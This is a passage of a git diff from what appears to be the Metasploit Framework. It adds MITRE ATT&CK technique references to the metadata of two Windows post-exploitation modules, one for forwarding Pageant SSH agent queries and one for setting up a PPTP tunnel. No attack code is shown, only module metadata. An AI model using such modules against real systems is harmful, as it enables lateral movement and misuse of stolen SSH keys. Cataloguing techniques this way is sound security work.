'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] + ] ) ) diff --git a/modules/post/windows/manage/forward_pageant.rb b/modules/post/windows/manage/forward_pageant.rb index e794bd7fa6867..a2f3e6cc20553 100644 --- a/modules/post/windows/manage/forward_pageant.rb +++ b/modules/post/windows/manage/forward_pageant.rb @@ -43,7 +43,10 @@ def initialize(info = {}) extapi_pageant_send_query ] } - } + }, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] + ] ) ) register_options([ diff --git a/modules/post/windows/manage/pptp_tunnel.rb b/modules/post/windows/manage/pptp_tunnel.rb index d7b81464d9621..a4d96e358b90f 100644 --- a/modules/post/windows/manage/pptp_tunnel.rb +++ b/modules/post/windows/manage/pptp_tunnel.rb @@ -22,7 +22,8 @@ def initialize(info = {}) 'License' => MSF_LICENSE, 'Author' => 'Borja Merino ', 'References' => [ - [ 'URL', 'https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ] + [ 'URL', 'https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ],